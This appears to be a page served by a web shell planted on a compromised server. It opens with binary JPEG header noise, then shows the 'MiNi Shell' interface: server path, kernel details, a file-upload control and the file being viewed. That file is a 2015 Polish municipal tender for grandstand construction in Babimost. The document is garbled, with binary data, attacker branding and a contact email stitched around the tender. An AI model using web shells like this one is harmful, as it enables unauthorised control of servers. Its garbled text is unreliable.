JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150212/19171-N-2015.html

<p class="kh_header"><b>Babimost: Budowa trybun i zadaszenia przy budynku zaplecza socjalno-technicznego na terenie Centrum Sportu i Rekreacji w Babimoście</b><br>
<b>Numer ogłoszenia: 19171 - 2015; data zamieszczenia: 12.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Babimost , ul. Rynek 3, 66-110 Babimost, woj. lubuskie, tel. 068 3512034, faks 068 3512028.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.babimost.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa trybun i zadaszenia przy budynku zaplecza socjalno-technicznego na terenie Centrum Sportu i Rekreacji w Babimoście.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Budowa trybun wraz z zadaszeniem  przy budynku zaplecza socjalno - technicznego na terenie Centrum Sportu  i Rekreacji w Babimoście.
1.1 Konstrukcja Trybun:
Zakres budowy trybun obejmuje: roboty ziemne, fundamentowe, izolacyjne, murarskie, żelbetowe, osadzenie stolarki, tynkarskie, posadzkowe, malarskie, elewacyjne, zagospodarowanie terenu, elektryczne. Konstrukcję nośną trybun zaprojektowano w konstrukcji ośmiu ram żelbetowych trzynawowych w rozstawie co 7,00 m, rama składa się z rygla i 4 słupów, na podeście oparte są płyty żelbetowe prefabrykowane. Konstrukcja galerii trybun musi być powiązana  ze zbrojeniem wypuszczonym ze słupów istniejącego budynku zaplecza. Podczas budowy  trybun należy zamontować także kotwy montażowe konstrukcji zadaszenia. Ławy i stopy fundamentowe zaprojektowano jako żelbetowe monolityczne, stopy fundamentowe oznaczone w projekcie jako F1 należy powiązać z wypuszczonym zbrojeniem fundamentów słupów osadzonych w istniejącej ścianie budynku. Na ścianach i stopach  fundamentowych należy wykonać izolację przeciwwilgociową. Ściany zewnętrzne  szczytowe będą obudowane bloczkami z betonu komórkowego. Stolarka drzwiowa aluminiowa o wymiarach określonych w projekcie. Konstrukcja żelbetowa trybun monolityczna wylewana na budowie, w kolorach naturalnych betonu, elementy wykończeniowe gładkie, szlifowane i szpachlowane. Posadzka na galerii  powierzchniowo chemicznie utwardzana  jednocześnie  antypoślizgowa. W ramach zamówienia należy także wykonać instalację elektryczną   oświetleniową i zasilającą w zakresie objętym projektem budowlanym. 
Oferta powinna zawierać wykonanie wszystkich elementów konstrukcyjnych wraz 
z szalowaniem i wykonaniem robót wykończeniowych objętych projektem, roboty ziemne związane z odwiezieniem urobku. Na trybunach należy zamontować siedziska 
o parametrach nie niższych od wykazanych w dokumentacji, o wysokości oparcia nie niższej niż 36cm, numeracja miejsc oznakowana w sposób trwały.  
W zakres robót wchodzi także montaż balustrad i barierek stalowych proszkowo malowanych. Pod trybunami wykonać nawierzchnię z kostki brukowej gr. 6cm układanej na podbudowie z kruszywa łamanego o grubości po zagęszczeniu 15cm - powierzchnia do utwardzenia około 300m2. W kalkulacji kosztów budowy należy także uwzględnić koszt zabezpieczenia istniejącej bieżni lekkoatletycznej położonej w bezpośrednim sąsiedztwie  przed zniszczeniem czy uszkodzeniem. W przypadku uszkodzenia nawierzchni należy ją  przywrócić do stanu pierwotnego na koszt Wykonawcy. Jeżeli  w trakcie  realizacji inwestycji zajdzie potrzeba przebudowy kolidujących urządzeń infrastruktury technicznej (sieci  kanalizacyjne, energetyczne i inne), to Wykonawca wykona je w ramach wynagrodzenia ryczałtowego. Jeżeli w trakcie wykonywania robót fundamentowych zajdzie konieczność przegłębienia  wykopów, to Wykonawca jest zobowiązany do wykonania wszystkich robót w ramach zawartej umowy ryczałtowej. W kalkulacji należy uwzględnić wszystkie koszty związane z obsługą geodezyjną na etapie wykonawstwa, wraz z mapą geodezyjną powykonawczą. Plac budowy należy ogrodzić. Bezwzględnie należy przedłożyć atesty i certyfikaty na wbudowane materiały. Wszystkie roboty zanikowe dotyczące wykopów, robót zbrojarskich, izolacji przeciw - wilgociowej wymagają zgłoszenia do odbioru. W elementach żelbetowych należy zamocować kotwy umożliwiające montaż konstrukcji zadaszenia. W kalkulacji należy uwzględnić koszty zabezpieczenia przed uszkodzeniem ściany podłużnej istniejącego budynku zaplecza do którego będą dobudowane trybuny, należy przewidzieć przeprowadzenie renowacji tej ściany.
Ogólne  informacje  kubaturowo - techniczne  :
- powierzchnia zabudowy dla trybun - 470,33m2, - długość trybun - 47,25m,- szerokość trybun - 10,82m, - ilość miejsc siedzących - 556szt., - konstrukcja żelbetowa monolityczna, - nawierzchnia z kostki brukowej na podbudowie z tłucznia - 300m2, - instalacje energetyczne.
1.2  Zadaszenie trybun: Dach płaski jednospadowy o konstrukcji stalowej płatwiowej. Pokrycie blachą trapezową T40 gr 0,7mm. Blacha mocowana za pomocą wkrętów  z podkładką uszczelniającą, połączenie blach na zakładkę. W przęśle środkowym o rozpiętości L- 4,90m, pokrycie poliwęglanem - (wykonanie zgodnie z przyjętym systemem). Dokumentacja projektowa określa szczegółowe wymagania techniczne i materiałowe wykonania konstrukcji. Wykonawca jest zobowiązany do powiązania konstrukcji zadaszenia i trybun z wykonanym w pierwszym etapie budynkiem zaplecza socjalno-technicznego. Roboty z tym związane nie będą stanowiły robót dodatkowych, dlatego zaleca się przeprowadzenie wizji na obiekcie i zapoznanie się ze stanem  istniejącym. 
Podstawowe informacje  konstrukcyjne: Układ konstrukcyjny zadaszenia stanowi samonośna blacha trapezowa grubości 0,70mm, płatwie dachowe wieloprzęsłowe i jednoprzęsłowe o przekroju RP 160x80x5 stal S355JR łączone za pomocą  4 śrub M29 kl. 5,8, płatwie mocowane  do pasów górnych kratownic za pomocą 4 śrub M16, kratownica KR1 i KR2 pas górny i dolny wzmocniony miejscowo  nakładkami 110x4, krzyżulce i słupki o przekroju 50x40 - stal S355JR, połączenie  kratownicy z ze słupami S1, S2, S3 - śrubowe zakładkowe kategorii A za pomocą śruby M30. 
Słup S1 wykonany z rury fi 114,3 x 6 - stal S355, zamocowanie słupa w żelbecie za pomocą sześciu kotew fajkowych F20 L-840mm - stal S355JR.
Słup S2 wykonany z rury fi 114,3 x 6 - stal S355, zamocowanie słupa w żelbecie za pomocą sześciu kotew fajkowych F20  L-840mm - stal S355JR.
Słup S3 wykonany z rury fi 244,5 x 8  - stal S355, zamocowanie słupa w żelbecie za pomocą  ośmiu  kotew  fajkowych F20  L-900mm  - stal S355JR.
Ściąg sztywny szt. 1 wykonany z rury fi 114,3 x 6,0 - stal S355JR, połączenie ściągu 
z kratownicą KR1, KR2 , KR3 oraz ze słupem S3 śrubowe zakładkowe za pomocą śruby M39 Kl. 8,.8. Ściąg prętowy Ś.PR 1 i 2 wykonany z pręta fi 30 -nakrętka M 30,  połączenie z kratownicą  KR1, Kr2, KR3 oraz ze słupem S3 zakładkowe  śrubą M24.
Stężenia pionowe kratownic K1, K2 połączenie - śrubowe zakładkowe M20.
Stężenia pasów dolnych kratownic K3 do K6 wykonane ze stali S275J3W2 połączenie czołowe śrubą M20.Stężenia sztywne słupów S1, S2, S3 pas górny i dolny przekrój S4 i S5  pas góry i pas dolny- przekrój 80x4, krzyżulce i słupki 50x40 stal S355JR, połączenie stężeń ze słupami - śrubowe  czołowe. Stężenia słupów S4  i S5 - pas górny i dolny przekrój 50x4 - stal S355JR, połączenie  stężeń śrubowe czołowe  śrubą M20. Stężenie prętowe połaciowe  Typu X ST1 , P1 ST.P2 , ST.P3, ST.P4 , ST.P5 , St.P7 wykonane z pręta fi 20 zakończone nakrętkami  M20.
Pomocnicze informacje kubaturowo-techniczne:
-Konstrukcja: słupy S1- szt. 2, S-3 -szt. 8, kratownice szt. 8, płatwie - kpl. 7, stężenia słupów kpl 9, stężenia kratownic kpl. 9, ściągi sztywne kpl. 16, ściągi i stężenia prętowe kpl. 1, konstrukcja dachu łukowego 1kpl.  
Zadaszenie:
Dach kryty blachą trapezową ~ 480,00m, Pokrycie poliwęglanem ~  68,00m2, Obróbki blacharskie ~ 45,00m2, Rynny dachowe ~ 42,00mb, Rury spustowe ~ 6,00mb.
Konstrukcja zadaszenie wymaga zabezpieczenia antykorozyjnego określonego przez projektanta, kolorystyka konstrukcji zadaszenia - oliwka  RAL7002, blacha dachowa 
w kolorze jasnoszarym RAL 7035, siedzenia na trybunach w kolorze - czerwonym, barierki w kolorze ciemno-szarym  RAL7045. 
Uwaga ww. podane obmiary są  elementem pomocniczym - Wykonawca jest zobowiązany do wyceny projektu budowlanego, a zaoferowana cena musi zawierać wszystkie koszty związane z wykonaniem zamówienia. 
Roboty elektryczne do wykonania na trybunach: Konstrukcja trybun wymaga wykonania instalacji odgromowej, szczegółowy opis jest zawarty w dokumentacji projektowej, ponadto na trybunach należy zamontować pięć kompletów lamp  wraz z okablowaniem i osprzętem. Zgodnie z projektem nad trybunami należy wykonać  kompletną instalację monitoringu wraz z montażem  2 szt. kamer połączoną z istniejącym monitoringiem w budynku zaplecza. Po wykonaniu robót elektrycznych i odgromowych wymagane jest przedstawienie protokołów badań instalacji. Wykonawca konstrukcji zadaszenia trybun jest zobowiązany do umożliwienia inspektorowi nadzoru inwestorskiego  monitorowania  procesu  wytwarzania  elementów  przed ich  dostarczeniem na plac budowy i  zamontowaniem.
Ponadto szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacji technicznej - projekcie wykonawczym, specyfikacji technicznej wykonania i odbioru robót, przedmiarach robót - będącymi załącznikami do SIWZ.

2. Wszystkie materiały i urządzenia muszą posiadać odpowiednie atesty i certyfikaty, spełniać normy bezpieczeństwa. Wykonawca wykona przedmiot zamówienia z materiałów - wyrobów dopuszczonych do używania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (j. t.  Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.) oraz ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2004 r. Nr 92, poz. 881 ze zm.) oraz innych przepisów, o ile mają zastosowanie.

3. Wszystkie urządzenia muszą być fabrycznie nowe oraz oznakowane zgodnie z wymogami wynikającymi z przepisów bezpieczeństwa, norm EN i PN oraz przepisów  Prawa Budowlanego.

4. Planowany, zakres rzeczowy prac przedstawiony został w:
- projekcie wykonawczym, - przedmiarach robót, - specyfikacji technicznej wykonania i odbioru robót. Wymienione dokumenty są załącznikami do niniejszej SIWZ.

Przedmiary robót stanowią jedynie element pomocniczy do kalkulacji kosztów. 
Roboty nie ujęte w przedmiarach robót, STWIOR i niniejszej SIWZ, a niezbędne do wykonania robót objętych projektem wykonawczym nie będą stanowiły robót dodatkowych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.20.00-6, 45.22.30.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 20.000,00PLN (słownie: dwadzieścia tysięcy złotych 00/100). Wadium musi być wniesione przed terminem składania ofert. Wadium musi obejmować okres związania ofertą</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie szczegółowych warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia posiadania wiedzy i doświadczenia wymagane jest wykazanie przez Wykonawcę wykonania co najmniej 1 roboty budowlanej polegającej na budowie konstrukcji żelbetowej połączonej z konstrukcją stalową o wartości minimum 1.000.000,00zł,  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie szczegółowych warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie szczegółowych warunków</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, że:
a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 1.000.000,00zł, b) posiada środki finansowe lub zdolność kredytową na kwotę równą co najmniej 1.000.000,00zł. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z postanowieniami art. 144 ust. 1 ustawy Prawo zamówień publicznych
Zamawiający przewiduje możliwość dokonania zmian po zawarciu umowy w sprawie zamówienia publicznego, pod warunkiem podpisania aneksu zaakceptowanego przez obie strony. W szczególności Zamawiający dopuszcza: 1) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp., 2) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym  wpływ na realizację przedmiotu zamówienia, 3) ze względu na dofinansowanie zadania możliwa jest zmiana umowy w zakresie konieczności dostosowania umowy z Wykonawcą do postanowień umowy o dofinansowanie oraz zaleceń wydanych przez Instytucje Dofinansowujące</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wrota.lubuskie.pl/ugbabimost<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego - Urząd Miejski w Babimoście biuro nr 5, od dnia 12.02.2015r.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2015 godzina 10:00, miejsce: Sekretariat Urzędu Miejskiego w Babimoście ul. Rynek 3, 66 - 110 Babimost.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com